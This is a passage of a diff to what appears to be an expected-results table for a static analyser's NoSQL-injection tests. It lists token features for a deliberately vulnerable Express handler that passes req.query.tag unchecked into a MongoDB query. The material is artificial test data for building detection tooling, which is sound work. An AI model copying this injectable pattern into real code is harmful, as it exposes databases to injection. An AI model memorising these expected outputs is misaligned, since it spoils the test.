app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:7:65:10 | find | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:12:65:16 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:12:65:16 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:12:65:16 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1774,6 +9508,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:12:65:16 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:12:65:16 | query | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:65:12:65:16 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:69:3 | app | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:69:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:69:3 | app | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:69:8 | app.post | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:69:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:69:8 | app.post | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:86:2 | app.pos ... });\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:86:2 | app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:86:2 | app.pos ... });\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:86:2 | exceptional return of app.pos ... });\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:86:2 | exceptional return of app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:1:86:2 | exceptional return of app.pos ... });\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:5:69:8 | post | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:5:69:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:5:69:8 | post | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:10:69:29 | "/logs/count-by-tag" | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:10:69:29 | "/logs/count-by-tag" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:10:69:29 | "/logs/count-by-tag" | calleeImports | express | @@ -1781,6 +9530,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:10:69:29 | "/logs/count-by-tag" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:10:69:29 | "/logs/count-by-tag" | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:10:69:29 | "/logs/count-by-tag" | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:31 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:31 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:31 | MongoClient | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:31 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:31 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:31 | require | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:31 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:31 | require | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:31 | require | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:31 | require | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:32 | tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:32 | tag | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:32 | tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:32 | tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:69:32 | tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | (req, r ... g });\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | (req, r ... g });\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | (req, r ... g });\\n} | calleeImports | express | @@ -1788,6 +9557,109 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | (req, r ... g });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | (req, r ... g });\\n} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | (req, r ... g });\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | exceptional return of anonymous function | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | return of anonymous function | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:32:86:1 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:33:69:35 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:33:69:35 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:33:69:35 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:33:69:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:33:69:35 | req | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:33:69:35 | req | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:33:69:35 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:33:69:35 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:33:69:35 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:33:69:35 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:38:69:40 | res | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:38:69:40 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:38:69:40 | res | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:38:69:40 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:69:38:69:40 | res | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:9 | tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:9 | tag | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:9 | tag | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:9 | tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:9 | tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:9 | tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:9 | tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:9 | tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:25 | tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:25 | tag | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:25 | tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:25 | tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:25 | tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:25 | tag = req.query.tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:25 | tag = req.query.tag | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:25 | tag = req.query.tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:25 | tag = req.query.tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:7:70:25 | tag = req.query.tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:15 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:15 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:15 | req | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:15 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:15 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:21 | req.query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:21 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:21 | req.query | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:21 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:21 | req.query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:25 | req.query.tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:25 | req.query.tag | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:25 | req.query.tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:25 | req.query.tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:13:70:25 | req.query.tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:17:70:21 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:17:70:21 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:17:70:21 | query | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:17:70:21 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:17:70:21 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:23:70:25 | tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:23:70:25 | tag | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:23:70:25 | tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:23:70:25 | tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:70:23:70:25 | tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:72:13 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:72:13 | MongoClient | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:72:13 | MongoClient | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:72:13 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:72:13 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:72:21 | MongoClient.connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:72:21 | MongoClient.connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:72:21 | MongoClient.connect | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:72:21 | MongoClient.connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:72:21 | MongoClient.connect | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:78:4 | MongoCl ... );\\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:78:4 | MongoCl ... );\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:78:4 | MongoCl ... );\\n }) | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:78:4 | MongoCl ... );\\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:78:4 | MongoCl ... );\\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:78:4 | exceptional return of MongoCl ... );\\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:78:4 | exceptional return of MongoCl ... );\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:78:4 | exceptional return of MongoCl ... );\\n }) | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:78:4 | exceptional return of MongoCl ... );\\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:3:78:4 | exceptional return of MongoCl ... );\\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:15:72:21 | connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:15:72:21 | connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:15:72:21 | connect | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:15:72:21 | connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:15:72:21 | connect | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:29 | process | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:29 | process | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:29 | process | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:29 | process | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:29 | process | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:33 | process.env | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:33 | process.env | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:33 | process.env | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:33 | process.env | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:33 | process.env | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:40 | process.env.DB_URL | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:40 | process.env.DB_URL | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:40 | process.env.DB_URL | calleeImports | mongodb | @@ -1797,6 +9669,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:40 | process.env.DB_URL | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:40 | process.env.DB_URL | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:23:72:40 | process.env.DB_URL | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:31:72:33 | env | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:31:72:33 | env | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:31:72:33 | env | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:31:72:33 | env | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:31:72:33 | env | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:35:72:40 | DB_URL | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:35:72:40 | DB_URL | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:35:72:40 | DB_URL | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:35:72:40 | DB_URL | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:35:72:40 | DB_URL | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:43:72:44 | {} | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:43:72:44 | {} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:43:72:44 | {} | calleeImports | mongodb | @@ -1806,6 +9688,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:43:72:44 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:43:72:44 | {} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:43:72:44 | {} | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:72:46 | tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:72:46 | tag | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:72:46 | tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:72:46 | tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:72:46 | tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | (err, c ... });\\n } | CalleeFlexibleAccessPath | MongoClient.connect | | 